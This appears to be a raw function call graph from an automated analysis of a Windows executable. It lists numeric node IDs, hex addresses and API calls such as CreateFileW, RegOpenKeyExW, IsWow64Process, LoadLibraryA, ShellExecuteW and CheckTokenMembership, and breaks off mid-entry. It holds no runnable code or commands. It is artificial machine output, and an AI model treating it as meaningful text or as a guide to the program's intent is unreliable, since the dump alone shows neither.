39 API calls 103296->103307 103298 cec01b 103298->102415 103300 ced1c7 103299->103300 103305 cecf93 103299->103305 103300->103284 103302 cebf73 8 API calls 103302->103305 103303 ced03d 103303->103284 103305->103302 103305->103303 103308 d005b2 5 API calls __Init_thread_wait 103305->103308 103309 d00413 29 API calls __onexit 103305->103309 103310 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103305->103310 103307->103298 103308->103305 103309->103305 103310->103305 103311 cef4c0 103314 cfa025 103311->103314 103313 cef4cc 103315 cfa046 103314->103315 103316 cfa0a3 103314->103316 103315->103316 103318 cf0340 207 API calls 103315->103318 103320 cfa0e7 103316->103320 103323 d53fe1 81 API calls __wsopen_s 103316->103323 103321 cfa077 103318->103321 103319 d3806b 103319->103319 103320->103313 103321->103316 103321->103320 103322 cebed9 8 API calls 103321->103322 103322->103316 103323->103319 103324 cf0ebf 103325 cf0ed3 103324->103325 103330 cf1425 103324->103330 103326 cf0ee5 103325->103326 103327 d0014b 8 API calls 103325->103327 103328 d3562c 103326->103328 103329 ceb4c8 8 API calls 103326->103329 103331 cf0f3e 103326->103331 103327->103326 103357 d51b14 8 API calls 103328->103357 103329->103326 103330->103326 103334 cebed9 8 API calls 103330->103334 103332 cf2b20 207 API calls 103331->103332 103349 cf049d ISource 103331->103349 103352 cf0376 ISource 103332->103352 103334->103326 103335 d3632b 103361 d53fe1 81 API calls __wsopen_s 103335->103361 103336 cf1e50 40 API calls 103336->103352 103337 cf1695 103344 cebed9 8 API calls 103337->103344 103337->103349 103338 d0014b 8 API calls 103338->103352 103340 cebed9 8 API calls 103340->103352 103341 d35cdb 103348 cebed9 8 API calls 103341->103348 103341->103349 103342 d3625a 103360 d53fe1 81 API calls __wsopen_s 103342->103360 103343 cf0aae ISource 103359 d53fe1 81 API calls __wsopen_s 103343->103359 103344->103349 103347 cf1990 207 API calls 103347->103352 103348->103349 103350 d005b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103350->103352 103351 cebf73 8 API calls 103351->103352 103352->103335 103352->103336 103352->103337 103352->103338 103352->103340 103352->103341 103352->103342 103352->103343 103352->103347 103352->103349 103352->103350 103352->103351 103353 d00413 29 API calls pre_c_initialization 103352->103353 103354 d36115 103352->103354 103356 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103352->103356 103353->103352 103358 d53fe1 81 API calls __wsopen_s 103354->103358 103356->103352 103357->103349 103358->103343 103359->103349 103360->103349 103361->103349 103362 cef4dc 103363 cecab0 207 API calls 103362->103363 103364 cef4ea 103363->103364 103365 d18782 103370 d1853e 103365->103370 103367 d187aa 103375 d1856f try_get_first_available_module 103370->103375 103372 d1876e 103389 d12b5c 26 API calls pre_c_initialization 103372->103389 103374 d186c3 103374->103367 103382 d20d04 103374->103382 103378 d186b8 103375->103378 103385 d0917b 40 API calls 2 library calls 103375->103385 103377 d1870c 103377->103378 103386 d0917b 40 API calls 2 library calls 103377->103386 103378->103374 103388 d0f649 20 API calls __dosmaperr 103378->103388 103380 d1872b 103380->103378 103387 d0917b 40 API calls 2 library calls 103380->103387 103390 d20401 103382->103390 103384 d20d1f 103384->103367 103385->103377 103386->103380 103387->103378 103388->103372 103389->103374 103391 d2040d ___DestructExceptionObject 103390->103391 103392 d2041b 103391->103392 103395 d20454 103391->103395 103448 d0f649 20 API calls __dosmaperr 103392->103448 103394 d20420 103449 d12b5c 26 API calls pre_c_initialization 103394->103449 103401 d209db 103395->103401 103400 d2042a __wsopen_s 103400->103384 103451 d207af 103401->103451 103404 d20a26 103469 d15594 103404->103469 103405 d20a0d 103483 d0f636 20 API calls __dosmaperr 103405->103483 103408 d20a12 103484 d0f649 20 API calls __dosmaperr 103408->103484 103409 d20a2b 103410 d20a34 103409->103410 103411 d20a4b 103409->103411 103485 d0f636 20 API calls __dosmaperr 103410->103485 103482 d2071a CreateFileW 103411->103482 103415 d20478 103450 d204a1 LeaveCriticalSection __wsopen_s 103415->103450 103416 d20a39 103486 d0f649 20 API calls __dosmaperr 103416->103486 103417 d20b01 GetFileType 103420 d20b53 103417->103420 103421 d20b0c GetLastError 103417->103421 103419 d20ad6 GetLastError 103488 d0f613 20 API calls __dosmaperr 103419->103488 103491 d154dd 21 API calls 2 library calls 103420->103491 103489 d0f613 20 API calls __dosmaperr 103421->103489 103422 d20a84 103422->103417 103422->103419 103487 d2071a CreateFileW 103422->103487 103426 d20b1a CloseHandle 103426->103408 103429 d20b43 103426->103429 103428 d20ac9 103428->103417 103428->103419 103490 d0f649 20 API calls __dosmaperr 103429->103490 103431 d20b74 103433 d20bc0 103431->103433 103492 d2092b 72 API calls 3 library calls 103431->103492 103432 d20b48 103432->103408 103437 d20bed 103433->103437 103493 d204cd 72 API calls 4 library calls 103433->103493 103436 d20be6 103436->103437 103438 d20bfe 103436->103438 103494 d18a2e 103437->103494 103438->103415 103440 d20c7c CloseHandle 103438->103440 103509 d2071a CreateFileW 103440->103509 103442 d20ca7 103443 d20cdd 103442->103443 103444 d20cb1 GetLastError 103442->103444 103443->103415 103510 d0f613 20 API calls __dosmaperr 103444->103510 103446 d20cbd 103511 d156a6 21 API calls 2 library calls 103446->103511 103448->103394 103449->103400 103450->103400 103452 d207d0 103451->103452 103453 d207ea 103451->103453 103452->103453 103519 d0f649 20 API calls __dosmaperr 103452->103519 103512 d2073f 103453->103512 103455 d20822 103459 d20851 103455->103459 103521 d0f649 20 API calls __dosmaperr 103455->103521 103457 d207df 103520 d12b5c 26 API calls pre_c_initialization 103457->103520 103466 d208a4 103459->103466 103523 d0da7d 26 API calls 2 library calls 103459->103523 103462 d2089f 103464 d2091e 103462->103464 103462->103466 103463 d20846 103522 d12b5c 26 API calls pre_c_initialization 103463->103522 103524 d12b6c 11 API calls _abort 103464->103524 103466->103404 103466->103405 103468 d2092a 103470 d155a0 ___DestructExceptionObject 103469->103470 103527 d132d1 EnterCriticalSection 103470->103527 103472 d155a7 103474 d155cc 103472->103474 103478 d1563a EnterCriticalSection 103472->103478 103480 d155ee 103472->103480 103531 d15373 103474->103531 103475 d15617 __wsopen_s 103475->103409 103479 d15647 LeaveCriticalSection 103478->103479 103478->103480 103479->103472 103528 d1569d 103480->103528 103482->103422 103483->103408 103484->103415 103485->103416 103486->103408 103487->103428 103488->103408 103489->103426 103490->103432 103491->103431 103492->103433 103493->103436 103495 d15737 __wsopen_s 26 API calls 103494->103495 103498 d18a3e 103495->103498 103496 d18a44 103550 d156a6 21 API calls 2 library calls 103496->103550 103498->103496 103499 d18a76 103498->103499 103501 d15737 __wsopen_s 26 API calls 103498->103501 103499->103496 103502 d15737 __wsopen_s 26 API calls 103499->103502 103500 d18a9c 103503 d18abe 103500->103503 103551 d0f613 20 API calls __dosmaperr 103500->103551 103504 d18a6d 103501->103504 103505 d18a82 CloseHandle 103502->103505 103503->103415 103507 d15737 __wsopen_s 26 API calls 103504->103507 103505->103496 103508 d18a8e GetLastError 103505->103508 103507->103499 103508->103496 103509->103442 103510->103446 103511->103443 103514 d20757 103512->103514 103513 d20772 103513->103455 103514->103513 103525 d0f649 20 API calls __dosmaperr 103514->103525 103516 d20796 103526 d12b5c 26 API calls pre_c_initialization 103516->103526 103518 d207a1 103518->103455 103519->103457 103520->103453 103521->103463 103522->103459 103523->103462 103524->103468 103525->103516 103526->103518 103527->103472 103539 d13319 LeaveCriticalSection 103528->103539 103530 d156a4 103530->103475 103540 d14ff0 103531->103540 103533 d15385 103537 d15392 103533->103537 103547 d13778 11 API calls 2 library calls 103533->103547 103534 d12d38 _free 20 API calls 103536 d153e4 103534->103536 103536->103480 103538 d154ba EnterCriticalSection 103536->103538 103537->103534 103538->103480 103539->103530 103546 d14ffd pre_c_initialization 103540->103546 103541 d1503d 103549 d0f649 20 API calls __dosmaperr 103541->103549 103542 d15028 RtlAllocateHeap 103544 d1503b 103542->103544 103542->103546 103544->103533 103546->103541 103546->103542 103548 d0521d 7 API calls 2 library calls 103546->103548 103547->103533 103548->103546 103549->103544 103550->103500 103551->103503 103552 cf235c 103561 cf2365 __fread_nolock 103552->103561 103553 ce8ec0 52 API calls 103553->103561 103554 d374e3 103564 d413c8 8 API calls __fread_nolock 103554->103564 103556 d374ef 103560 cebed9 8 API calls 103556->103560 103562 cf1ff7 __fread_nolock 103556->103562 103557 cf23b6 103559 ce7d74 8 API calls 103557->103559 103558 d0014b 8 API calls 103558->103561 103559->103562 103560->103562 103561->103553 103561->103554 103561->103557 103561->103558 103561->103562 103563 d0017b 8 API calls 103561->103563 103563->103561 103564->103556 103565 cedd3d 103566 d319c2 103565->103566 103567 cedd63 103565->103567 103571 d31a82 103566->103571 103572 d31a26 103566->103572 103579 d31a46 103566->103579 103568 cedead 103567->103568 103569 d0014b 8 API calls 103567->103569 103573 d0017b 8 API calls 103568->103573 103576 cedd8d 103569->103576 103625 d53fe1 81 API calls __wsopen_s 103571->103625 103623 cfe6e8 207 API calls 103572->103623 103584 cedee4 __fread_nolock 103573->103584 103574 d31a7d 103578 d0014b 8 API calls 103576->103578 103576->103584 103580 cedddb 103578->103580 103579->103574 103624 d53fe1 81 API calls __wsopen_s 103579->103624 103580->103572 103582 cede16 103580->103582 103581 d0017b 8 API calls 103581->103584 103583 cf0340 207 API calls 103582->103583 103585 cede29 103583->103585 103584->103579 103584->103581 103585->103574 103585->103584 103586 d31aa5 103585->103586 103587 cede77 103585->103587 103589 ced526 103585->103589 103626 d53fe1 81 API calls __wsopen_s 103586->103626 103587->103568 103587->103589 103590 d0014b 8 API calls 103589->103590 103591 ced589 103590->103591 103607 cec32d 103591->103607 103594 d0014b 8 API calls 103595 ced66e ISource 103594->103595 103597 ceb4c8 8 API calls 103595->103597 103599 d31f79 103595->103599 103601 d31f94 103595->103601 103602 cebed9 8 API calls 103595->103602 103605 ced911 ISource 103595->103605 103614 cec3ab 103595->103614 103596 cec3ab 8 API calls 103604 ced9ac ISource 103596->103604 103597->103595 103627 d456ae 8 API calls ISource 103599->103627 103602->103595 103606 ced9c3 103604->103606 103622 cfe30a 8 API calls ISource 103604->103622 103605->103596 103605->103604 103613 cec33d 103607->103613 103608 cec345 103608->103594 103609 d0014b 8 API calls 103609->103613 103610 cebf73 8 API calls 103610->103613 103611 cebed9 8 API calls 103611->103613 103612 cec32d 8 API calls 103612->103613 103613->103608 103613->103609 103613->103610 103613->103611 103613->103612 103615 cec3b9 103614->103615 103621 cec3e1 ISource 103614->103621 103616 cec3c7 103615->103616 103617 cec3ab 8 API calls 103615->103617 103618 cec3cd 103616->103618 103619 cec3ab 8 API calls 103616->103619 103617->103616 103618->103621 103628 cec7e0 8 API calls ISource 103618->103628 103619->103618 103621->103595 103622->103604 103623->103579 103624->103574 103625->103574 103626->103574 103627->103601 103628->103621 103629 ce105b 103634 ce52a7 103629->103634 103631 ce106a 103665 d00413 29 API calls __onexit 103631->103665 103633 ce1074 103635 ce52b7 __wsopen_s 103634->103635 103636 cebf73 8 API calls 103635->103636 103637 ce536d 103636->103637 103666 ce5594 103637->103666 103639 ce5376 103673 ce5238 103639->103673 103642 ce6b7c 8 API calls 103643 ce538f 103642->103643 103679 ce6a7c 103643->103679 103646 cebf73 8 API calls 103647 ce53a7 103646->103647 103648 cebd57 8 API calls 103647->103648 103649 ce53b0 RegOpenKeyExW 103648->103649 103650 d24be6 RegQueryValueExW 103649->103650 103654 ce53d2 103649->103654 103651 d24c03 103650->103651 103652 d24c7c RegCloseKey 103650->103652 103653 d0017b 8 API calls 103651->103653 103652->103654 103657 d24c8e _wcslen 103652->103657 103655 d24c1c 103653->103655 103654->103631 103656 ce423c 8 API calls 103655->103656 103658 d24c27 RegQueryValueExW 103656->103658 103657->103654 103659 ce655e 8 API calls 103657->103659 103663 ceb329 8 API calls 103657->103663 103664 ce6a7c 8 API calls 103657->103664 103660 d24c5e ISource 103658->103660 103661 d24c44 103658->103661 103659->103657 103660->103652 103662 ce8577 8 API calls 103661->103662 103662->103660 103663->103657 103664->103657 103665->103633 103667 d222d0 __wsopen_s 103666->103667 103668 ce55a1 GetModuleFileNameW 103667->103668 103669 ceb329 8 API calls 103668->103669 103670 ce55c7 103669->103670 103671 ce5851 9 API calls 103670->103671 103672 ce55d1 103671->103672 103672->103639 103674 d222d0 __wsopen_s 103673->103674 103675 ce5245 GetFullPathNameW 103674->103675 103676 ce5267 103675->103676 103677 ce8577 8 API calls 103676->103677 103678 ce5285 103677->103678 103678->103642 103680 ce6a8b 103679->103680 103684 ce6aac __fread_nolock 103679->103684 103682 d0017b 8 API calls 103680->103682 103681 d0014b 8 API calls 103683 ce539e 103681->103683 103682->103684 103683->103646 103684->103681 103685 d31ac5 103686 d31acd 103685->103686 103689 ced535 103685->103689 103716 d47a87 8 API calls __fread_nolock 103686->103716 103688 d31adf 103717 d47a00 8 API calls __fread_nolock 103688->103717 103691 d0014b 8 API calls 103689->103691 103693 ced589 103691->103693 103692 d31b09 103694 cf0340 207 API calls 103692->103694 103696 cec32d 8 API calls 103693->103696 103695 d31b30 103694->103695 103697 d31b44 103695->103697 103718 d661a2 53 API calls _wcslen 103695->103718 103699 ced5b3 103696->103699 103700 d0014b 8 API calls 103699->103700 103703 ced66e ISource 103700->103703 103701 d31b61 103701->103689 103719 d47a87 8 API calls __fread_nolock 103701->103719 103705 ceb4c8 8 API calls 103703->103705 103707 d31f79 103703->103707 103709 d31f94 103703->103709 103711 cebed9 8 API calls 103703->103711 103712 cec3ab 8 API calls 103703->103712 103713 ced911 ISource 103703->103713 103704 cec3ab 8 API calls 103710 ced9ac ISource 103704->103710 103705->103703 103720 d456ae 8 API calls ISource 103707->103720 103714 ced9c3 103710->103714 103715 cfe30a 8 API calls ISource 103710->103715 103711->103703 103712->103703 103713->103704 103713->103710 103715->103710 103716->103688 103717->103692 103718->103701 103719->103701 103720->103709 103721 ce1098 103726 ce5fc8 103721->103726 103725 ce10a7 103727 cebf73 8 API calls 103726->103727 103728 ce5fdf GetVersionExW 103727->103728 103729 ce8577 8 API calls 103728->103729 103730 ce602c 103729->103730 103731 ceadf4 8 API calls 103730->103731 103735 ce6062 103730->103735 103732 ce6056 103731->103732 103734 ce55dc 8 API calls 103732->103734 103733 ce611c GetCurrentProcess IsWow64Process 103736 ce6138 103733->103736 103734->103735 103735->103733 103737 d25224 103735->103737 103738 d25269 GetSystemInfo 103736->103738 103739 ce6150 LoadLibraryA 103736->103739 103740 ce619d GetSystemInfo 103739->103740 103741 ce6161 GetProcAddress 103739->103741 103742 ce6177 103740->103742 103741->103740 103743 ce6171 GetNativeSystemInfo 103741->103743 103744 ce617b FreeLibrary 103742->103744 103745 ce109d 103742->103745 103743->103742 103744->103745 103746 d00413 29 API calls __onexit 103745->103746 103746->103725 103747 ce36f5 103750 ce370f 103747->103750 103751 ce3726 103750->103751 103752 ce378a 103751->103752 103753 ce372b 103751->103753 103790 ce3788 103751->103790 103757 d23df4 103752->103757 103758 ce3790 103752->103758 103754 ce3738 103753->103754 103755 ce3804 PostQuitMessage 103753->103755 103759 d23e61 103754->103759 103760 ce3743 103754->103760 103784 ce3709 103755->103784 103756 ce376f DefWindowProcW 103756->103784 103805 ce2f92 10 API calls 103757->103805 103762 ce37bc SetTimer RegisterWindowMessageW 103758->103762 103763 ce3797 103758->103763 103808 d4c8f7 65 API calls ___scrt_fastfail 103759->103808 103766 ce380e 103760->103766 103767 ce374d 103760->103767 103768 ce37e5 CreatePopupMenu 103762->103768 103762->103784 103764 d23d95 103763->103764 103765 ce37a0 KillTimer 103763->103765 103776 d23dd0 MoveWindow 103764->103776 103777 d23d9a 103764->103777 103771 ce3907 Shell_NotifyIconW 103765->103771 103795 cffcad 103766->103795 103772 d23e46 103767->103772 103773 ce3758 103767->103773 103768->103784 103770 d23e15 103806 cff23c 40 API calls 103770->103806 103780 ce37b3 103771->103780 103772->103756 103807 d41423 8 API calls 103772->103807 103781 ce37f2 103773->103781 103782 ce3763 103773->103782 103776->103784 103778 d23da0 103777->103778 103779 d23dbf SetFocus 103777->103779 103778->103782 103785 d23da9 103778->103785 103779->103784 103802 ce59ff DeleteObject DestroyWindow 103780->103802 103803 ce381f 75 API calls ___scrt_fastfail 103781->103803 103782->103756 103792 ce3907 Shell_NotifyIconW 103782->103792 103783 d23e73 103783->103756 103783->103784 103804 ce2f92 10 API calls 103785->103804 103790->103756 103791 ce3802 103791->103784 103793 d23e3a 103792->103793 103794 ce396b 60 API calls 103793->103794 103794->103790 103796 cffd4b 103795->103796 103797 cffcc5 ___scrt_fastfail 103795->103797 103796->103784 103798 ce61a9 55 API calls 103797->103798 103800 cffcec 103798->103800 103799 cffd34 KillTimer SetTimer 103799->103796 103800->103799 103801 d3fe2b Shell_NotifyIconW 103800->103801 103801->103799 103802->103784 103803->103791 103804->103784 103805->103770 103806->103782 103807->103790 103808->103783 103809 d0076b 103810 d00777 ___DestructExceptionObject 103809->103810 103839 d00221 103810->103839 103812 d0077e 103813 d008d1 103812->103813 103816 d007a8 103812->103816 103877 d00baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103813->103877 103815 d008d8 103878 d051c2 28 API calls _abort 103815->103878 103827 d007e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103816->103827 103850 d127ed 103816->103850 103818 d008de 103879 d05174 28 API calls _abort 103818->103879 103822 d008e6 103823 d007c7 103825 d00848 103858 d00cc9 103825->103858 103827->103825 103873 d0518a 38 API calls 3 library calls 103827->103873 103828 d0084e 103862 ce331b 103828->103862 103833 d0086a 103833->103815 103834 d0086e 103833->103834 103835 d00877 103834->103835 103875 d05165 28 API calls _abort 103834->103875 103876 d003b0 13 API calls 2 library calls 103835->103876 103838 d0087f 103838->103823 103840 d0022a 103839->103840 103880 d00a08 IsProcessorFeaturePresent 103840->103880 103842 d00236 103881 d03004 10 API calls 3 library calls 103842->103881 103844 d0023b 103845 d0023f 103844->103845 103882 d12687 103844->103882 103845->103812 103848 d00256 103848->103812 103851 d12804 103850->103851 103852 d00dfc CatchGuardHandler 5 API calls 103851->103852 103853 d007c1 103852->103853 103853->103823 103854 d12791 103853->103854 103855 d127c0 103854->103855 103856 d00dfc CatchGuardHandler 5 API calls 103855->103856 103857 d127e9 103856->103857 103857->103827 103933 d026b0 103858->103933 103861 d00cef 103861->103828 103863 ce3382 103862->103863 103864 ce3327 IsThemeActive 103862->103864 103874 d00d02 GetModuleHandleW 103863->103874 103935 d052b3 103864->103935 103866 ce3352 103941 d05319 103866->103941 103868 ce3359 103948 ce32e6 SystemParametersInfoW SystemParametersInfoW 103868->103948 103870 ce3360 103949 ce338b 103870->103949 103872 ce3368 SystemParametersInfoW 103872->103863 103873->103825 103874->103833 103875->103835 103876->103838 103877->103815 103878->103818 103879->103822 103880->103842 103881->103844 103886 d1d576 103882->103886 103885 d0302d 8 API calls 3 library calls 103885->103845 103889 d1d593 103886->103889 103890 d1d58f 103886->103890 103888 d00248 103888->103848 103888->103885 103889->103890 103892 d14f6e 103889->103892 103904 d00dfc 103890->103904 103893 d14f7a ___DestructExceptionObject 103892->103893 103911 d132d1 EnterCriticalSection 103893->103911 103895 d14f81 103912 d15422 103895->103912 103897 d14f90 103898 d14f9f 103897->103898 103925 d14e02 29 API calls 103897->103925 103927 d14fbb LeaveCriticalSection _abort 103898->103927 103901 d14f9a 103926 d14eb8 GetStdHandle GetFileType 103901->103926 103902 d14fb0 __wsopen_s 103902->103889 103905 d00e05 103904->103905 103906 d00e07 IsProcessorFeaturePresent 103904->103906 103905->103888 103908 d00fce 103906->103908 103932 d00f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103908->103932 103910 d010b1 103910->103888 103911->103895 103913 d1542e ___DestructExceptionObject 103912->103913 103914 d15452 103913->103914 103915 d1543b 103913->103915 103928 d132d1 EnterCriticalSection 103914->103928 103929 d0f649 20 API calls __dosmaperr 103915->103929 103918 d15440 103930 d12b5c 26 API calls pre_c_initialization 103918->103930 103920 d1544a __wsopen_s 103920->103897 103921 d1548a 103931 d154b1 LeaveCriticalSection _abort 103921->103931 103923 d15373 __wsopen_s 21 API calls 103924 d1545e 103923->103924 103924->103921 103924->103923 103925->103901 103926->103898 103927->103902 103928->103924 103929->103918 103930->103920 103931->103920 103932->103910 103934 d00cdc GetStartupInfoW 103933->103934 103934->103861 103936 d052bf ___DestructExceptionObject 103935->103936 103998 d132d1 EnterCriticalSection 103936->103998 103938 d052ca pre_c_initialization 103999 d0530a 103938->103999 103940 d052ff __wsopen_s 103940->103866 103942 d0533f 103941->103942 103943 d05325 103941->103943 103942->103868 103943->103942 104003 d0f649 20 API calls __dosmaperr 103943->104003 103945 d0532f 104004 d12b5c 26 API calls pre_c_initialization 103945->104004 103947 d0533a 103947->103868 103948->103870 103950 ce339b __wsopen_s 103949->103950 103951 cebf73 8 API calls 103950->103951 103952 ce33a7 GetCurrentDirectoryW 103951->103952 104005 ce4fd9 103952->104005 103954 ce33ce IsDebuggerPresent 103955 d23ca3 MessageBoxA 103954->103955 103956 ce33dc 103954->103956 103957 d23cbb 103955->103957 103956->103957 103958 ce33f0 103956->103958 104109 ce4176 8 API calls 103957->104109 104073 ce3a95 103958->104073 103965 ce3462 103967 d23cec SetCurrentDirectoryW 103965->103967 103968 ce346a 103965->103968 103967->103968 103969 ce3475 103968->103969 104110 d41fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 103968->104110 104105 ce34d3 7 API calls 103969->104105 103972 d23d07 103972->103969 103975 d23d19 103972->103975 103977 ce5594 10 API calls 103975->103977 103976 ce347f 103978 ce396b 60 API calls 103976->103978 103981 ce3494 103976->103981 103979 d23d22 103977->103979 103978->103981 103980 ceb329 8 API calls 103979->103980 103982 d23d30 103980->103982 103985 ce3907 Shell_NotifyIconW 103981->103985 103986 ce34af 103981->103986 103983 d23d38 103982->103983 103984 d23d5f 103982->103984 103987 ce6b7c 8 API calls 103983->103987 103988 ce6b7c 8 API calls 103984->103988 103985->103986 103989 ce34b6 SetCurrentDirectoryW 103986->103989 103990 d23d43 103987->103990 103991 d23d5b GetForegroundWindow ShellExecuteW 103988->103991 103992 ce34ca 103989->103992 103993 ce7bb5 8 API calls 103990->103993 103996 d23d90 103991->103996 103992->103872 103995 d23d51 103993->103995 103997 ce6b7c 8 API calls 103995->103997 103996->103986 103997->103991 103998->103938 104002 d13319 LeaveCriticalSection 103999->104002 104001 d05311 104001->103940 104002->104001 104003->103945 104004->103947 104006 cebf73 8 API calls 104005->104006 104007 ce4fef 104006->104007 104111 ce63d7 104007->104111 104009 ce500d 104010 cebd57 8 API calls 104009->104010 104011 ce5021 104010->104011 104012 cebed9 8 API calls 104011->104012 104013 ce502c 104012->104013 104125 ce893c 104013->104125 104016 ceb329 8 API calls 104017 ce5045 104016->104017 104018 cebe2d 39 API calls 104017->104018 104019 ce5055 104018->104019 104020 ceb329 8 API calls 104019->104020 104021 ce507b 104020->104021 104022 cebe2d 39 API calls 104021->104022 104023 ce508a 104022->104023 104024 cebf73 8 API calls 104023->104024 104025 ce50a8 104024->104025 104128 ce51ca 104025->104128 104028 d04d98 _strftime 40 API calls 104029 ce50c2 104028->104029 104030 d24b23 104029->104030 104031 ce50cc 104029->104031 104032 ce51ca 8 API calls 104030->104032 104033 d04d98 _strftime 40 API calls 104031->104033 104034 d24b37 104032->104034 104035 ce50d7 104033->104035 104037 ce51ca 8 API calls 104034->104037 104035->104034 104036 ce50e1 104035->104036 104038 d04d98 _strftime 40 API calls 104036->104038 104040 d24b53 104037->104040 104039 ce50ec 104038->104039 104039->104040 104041 ce50f6 104039->104041 104043 ce5594 10 API calls 104040->104043 104042 d04d98 _strftime 40 API calls 104041->104042 104044 ce5101 104042->104044 104045 d24b76 104043->104045 104046 d24b9f 104044->104046 104047 ce510b 104044->104047 104048 ce51ca 8 API calls 104045->104048 104050 ce51ca 8 API calls 104046->104050 104049 ce512e 104047->104049 104053 cebed9 8 API calls 104047->104053 104051 d24b82 104048->104051 104055 d24bda 104049->104055 104059 ce7e12 8 API calls 104049->104059 104054 d24bbd 104050->104054 104052 cebed9 8 API calls 104051->104052 104056 d24b90 104052->104056 104057 ce5121 104053->104057 104058 cebed9 8 API calls 104054->104058 104060 ce51ca 8 API calls 104056->104060 104061 ce51ca 8 API calls 104057->104061 104062 d24bcb 104058->104062 104063 ce513e 104059->104063 104060->104046 104061->104049 104064 ce51ca 8 API calls 104062->104064 104065 ce8470 8 API calls 104063->104065 104064->104055 104066 ce514c 104065->104066 104134 ce8a60 104066->104134 104068 ce893c 8 API calls 104070 ce5167 104068->104070 104069 ce8a60 8 API calls 104069->104070 104070->104068 104070->104069 104071 ce51ab 104070->104071 104072 ce51ca 8 API calls 104070->104072 104071->103954 104072->104070 104074 ce3aa2 __wsopen_s 104073->104074 104075 ce3abb 104074->104075 104077 d240da ___scrt_fastfail 104074->104077 104076 ce5851 9 API calls 104075->104076 104078 ce3ac4 104076->104078 104079 d240f6 GetOpenFileNameW 104077->104079 104146 ce3a57 104078->104146 104081 d24145 104079->104081 104082 ce8577 8 API calls 104081->104082 104084 d2415a 104082->104084 104084->104084 104086 ce3ad9 104164 ce62d5 104086->104164 104709 ce3624 7 API calls 104105->104709 104107 ce347a 104108 ce35b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104107->104108 104108->103976 104109->103965 104110->103972 104112 ce63e4 __wsopen_s 104111->104112 104113 ce8577 8 API calls 104112->104113 104114 ce6416 104112->104114 104113->104114 104115 ce655e 8 API calls 104114->104115 104124 ce644c 104114->104124 104115->104114 104116 ceb329 8 API calls 104117 ce6543 104116->104117 104119 ce6a7c 8 API calls 104117->104119 104118 ceb329 8 API calls 104118->104124 104121 ce654f 104119->104121 104120 ce655e 8 API calls 104120->104124 104121->104009 104122 ce6a7c 8 API calls 104122->104124 104123 ce651a 104123->104116 104123->104121 104124->104118 104124->104120 104124->104122 104124->104123 104126 d0014b 8 API calls 104125->104126 104127 ce5038 104126->104127 104127->104016 104129 ce51d4 104128->104129 104130 ce51f2 104128->104130 104132 ce50b4 104129->104132 104133 cebed9 8 API calls 104129->104133 104131 ce8577 8 API calls 104130->104131 104131->104132 104132->104028 104133->104132 104135 ce8a76 104134->104135 104136 d26737 104135->104136 104142 ce8a80 104135->104142 104145 cfb7a2 8 API calls 104136->104145 104137 d26744 104139 ceb4c8 8 API calls 104137->104139 104141 d26762 104139->104141 104140 ce8b9b 104140->104070 104141->104141 104142->104137 104142->104140 104143 ce8b94 104142->104143 104144 d0014b 8 API calls 104143->104144 104144->104140 104145->104137 104147 d222d0 __wsopen_s 104146->104147 104148 ce3a64 GetLongPathNameW 104147->104148 104149 ce8577 8 API calls 104148->104149 104150 ce3a8c 104149->104150 104151 ce53f2 104150->104151 104152 cebf73 8 API calls 104151->104152 104153 ce5404 104152->104153 104154 ce5851 9 API calls 104153->104154 104155 ce540f 104154->104155 104156 ce541a 104155->104156 104157 d24d5b 104155->104157 104159 ce6a7c 8 API calls 104156->104159 104161 d24d7d 104157->104161 104200 cfe36b 41 API calls 104157->104200 104160 ce5426 104159->104160 104194 ce1340 104160->104194 104163 ce5439 104163->104086 104201 ce6679 104164->104201 104195 ce1352 104194->104195 104199 ce1371 __fread_nolock 104194->104199 104198 d0017b 8 API calls 104195->104198 104196 d0014b 8 API calls 104197 ce1388 104196->104197 104197->104163 104198->104199 104199->104196 104200->104157 104380 ce663e LoadLibraryA 104201->104380 104206 d25648 104208 ce66e7 68 API calls 104206->104208 104207 ce66a4 LoadLibraryExW 104388 ce6607 LoadLibraryA 104207->104388 104210 d2564f 104208->104210 104212 ce6607 3 API calls 104210->104212 104214 d25657 104212->104214 104409 ce684a 104214->104409 104381 ce6656 GetProcAddress 104380->104381 104382 ce6674 104380->104382 104383 ce6666 104381->104383 104385 d0e95b 104382->104385 104383->104382 104384 ce666d FreeLibrary 104383->104384 104384->104382 104417 d0e89a 104385->104417 104387 ce6698 104387->104206 104387->104207 104389 ce661c GetProcAddress 104388->104389 104390 ce663b 104388->104390 104391 ce662c 104389->104391 104393 ce6720 104390->104393 104391->104390 104392 ce6634 FreeLibrary 104391->104392 104392->104390 104394 d0017b 8 API calls 104393->104394 104395 ce6735 104394->104395 104396 ce423c 8 API calls 104395->104396 104398 ce6741 __fread_nolock 104396->104398 104397 d256c2 104398->104397 104402 ce677c 104398->104402 104474 d53a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104398->104474 104401 ce684a 40 API calls 104401->104402 104402->104401 104403 d25706 104402->104403 104410 d25760 104409->104410 104411 ce685c 104409->104411 104507 d0ec34 104411->104507 104420 d0e8a6 ___DestructExceptionObject 104417->104420 104418 d0e8b4 104442 d0f649 20 API calls __dosmaperr 104418->104442 104420->104418 104421 d0e8e4 104420->104421 104423 d0e8f6 104421->104423 104424 d0e8e9 104421->104424 104422 d0e8b9 104443 d12b5c 26 API calls pre_c_initialization 104422->104443 104434 d183e1 104423->104434 104444 d0f649 20 API calls __dosmaperr 104424->104444 104428 d0e8ff 104431 d0e8c4 __wsopen_s 104431->104387 104435 d183ed ___DestructExceptionObject 104434->104435 104447 d132d1 EnterCriticalSection 104435->104447 104437 d183fb 104448 d1847b 104437->104448 104441 d1842c __wsopen_s 104441->104428 104442->104422 104443->104431 104444->104431 104447->104437 104455 d1849e 104448->104455 104449 d18408 104461 d18437 104449->104461 104450 d184f7 104451 d14ff0 pre_c_initialization 20 API calls 104450->104451 104452 d18500 104451->104452 104454 d12d38 _free 20 API calls 104452->104454 104456 d18509 104454->104456 104455->104449 104455->104450 104464 d094fd EnterCriticalSection 104455->104464 104465 d09511 LeaveCriticalSection 104455->104465 104456->104449 104466 d13778 